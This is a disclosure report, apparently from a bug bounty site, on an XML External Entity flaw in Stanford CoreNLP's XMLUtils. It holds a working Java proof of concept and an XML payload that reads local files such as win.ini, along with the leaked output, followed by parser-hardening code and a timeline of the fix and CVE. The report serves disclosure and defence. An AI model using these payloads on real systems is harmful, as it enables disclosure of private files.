Improper Restriction of XML External Entity Reference in stanfordnlp/corenlp

Valid

Reported on

Sep 29th 2021


✍️ Description

The Stanford CoreNLP package, a set of natural language analysis tools written in Java, parses XML with a parser that does not disable DTD processing or external entity resolution, and is therefore vulnerable to XML External Entity (XXE) injection. An attacker who can supply a crafted XML file as input to the getTextContentFromTagsFromFile() function in XMLUtils.java can make the parser resolve external entities, including disclosing the contents of local files, either in the returned text content (as in the proof of concept below) or to a remote server.

🕵️‍♂️ Proof of Concept

package xxe_poc;

import java.io.File;
import java.util.List;
import edu.stanford.nlp.util.XMLUtils;

public class Poc {

    public static void main(String[] args) {
        // Attacker-controlled XML file (path as on the researcher's workstation)
        File file = new File("C:\\Users\\[user]\\eclipse-workspace\\xxe_poc\\src\\main\\resources\\sample.xml");
        // Vulnerable entry point: parses the file with a DTD/entity-enabled parser and
        // returns the text content of every <lastName> element, with &ent; already expanded
        List<String> returnList = XMLUtils.getTextContentFromTagsFromFile(file, "lastName");
        System.out.print(returnList);
    }
}

sample.xml

<?xml version="1.0" ?>
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///c:/windows/win.ini"> ]>
<userInfo>
 <firstName>John</firstName>
 <lastName>&ent;</lastName>
</userInfo>

Output (the single element of the returned list is the contents of win.ini, expanded from &ent;):

[; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
]
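The following is an added example, not code from the report or from CoreNLP, and it does not claim to reproduce the project's actual fix in 5d83f1. It places a stock DocumentBuilderFactory (the permissive configuration the PoC relies on) beside a hardened one that rejects the DOCTYPE before any entity can be resolved, and runs the same entity payload through both via a helper shaped like getTextContentFromTagsFromFile(). The class name, helper names and the file:///etc/hostname target are assumptions chosen so the payload is platform-neutral; substitute file:///c:/windows/win.ini on Windows.

```java
import java.io.IOException;
import java.io.StringReader;
import java.util.ArrayList;
import java.util.List;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.w3c.dom.NodeList;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;

public class XxeHardening {

    // Constructed payload with the same shape as sample.xml above; the target file
    // is an assumption so the example runs on a non-Windows host.
    static final String PAYLOAD =
        "<?xml version=\"1.0\"?>\n"
      + "<!DOCTYPE replace [<!ENTITY ent SYSTEM \"file:///etc/hostname\">]>\n"
      + "<userInfo><firstName>John</firstName><lastName>&ent;</lastName></userInfo>";

    /** A factory with no features set: DTDs are processed and external entities
     *  are fetched, which is the configuration the report's PoC relies on. */
    static DocumentBuilder permissiveBuilder() throws ParserConfigurationException {
        return DocumentBuilderFactory.newInstance().newDocumentBuilder();
    }

    /** Hardened factory: refuse any DOCTYPE outright, and as defence in depth also
     *  disable external general/parameter entities, external DTD loading, entity
     *  expansion and XInclude, and enable secure processing. */
    static DocumentBuilder hardenedBuilder() throws ParserConfigurationException {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
        dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        dbf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        dbf.setXIncludeAware(false);
        dbf.setExpandEntityReferences(false);
        return dbf.newDocumentBuilder();
    }

    /** Same contract as getTextContentFromTagsFromFile(): the text of every <tag>
     *  element, but parsed with whichever builder the caller hands in. */
    static List<String> textContentOfTags(DocumentBuilder db, String xml, String tag)
            throws SAXException, IOException {
        Document doc = db.parse(new InputSource(new StringReader(xml)));
        NodeList nodes = doc.getElementsByTagName(tag);
        List<String> out = new ArrayList<>();
        for (int i = 0; i < nodes.getLength(); i++) {
            out.add(nodes.item(i).getTextContent());
        }
        return out;
    }

    public static void main(String[] args) throws Exception {
        // Permissive: the file's contents appear where &ent; was
        System.out.println("permissive: " + textContentOfTags(permissiveBuilder(), PAYLOAD, "lastName"));
        // Hardened: the parser throws on the DOCTYPE, before any entity is resolved
        try {
            textContentOfTags(hardenedBuilder(), PAYLOAD, "lastName");
            System.out.println("hardened: parsed (unexpected)");
        } catch (SAXException e) {
            System.out.println("hardened: rejected -> " + e.getMessage());
        }
    }
}
```

Rejecting the DOCTYPE is the right default for an input format that never legitimately needs one; if a DTD must be accepted, keep the remaining feature settings so that external entities are still never fetched. To check whether a given CoreNLP build is affected, look in XMLUtils.java for the DocumentBuilderFactory (or SAXParserFactory) used by getTextContentFromTagsFromFile() and confirm that these features are set before newDocumentBuilder() is called.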
We created a GitHub Issue asking the maintainers to create a SECURITY.md 2 months ago
Srikanth Prathi
2 months ago

Researcher


@maintainer Please find the patch at https://github.com/srikanthprathi/CoreNLP/pulls

Srikanth Prathi modified their report
2 months ago
Srikanth Prathi modified their report
2 months ago
We have contacted a member of the stanfordnlp/corenlp team and are waiting to hear back 2 months ago
stanfordnlp/corenlp maintainer validated this vulnerability 2 months ago
Srikanth Prathi has been awarded the disclosure bounty
The fix bounty is now up for grabs
stanfordnlp/corenlp maintainer confirmed that a fix has been merged on 5d83f1 2 months ago
Srikanth Prathi has been awarded the fix bounty
Jamie Slome
2 months ago

Admin


CVE published! 🎊

Srikanth Prathi
2 months ago

Researcher


Thanks for the confirmation :-)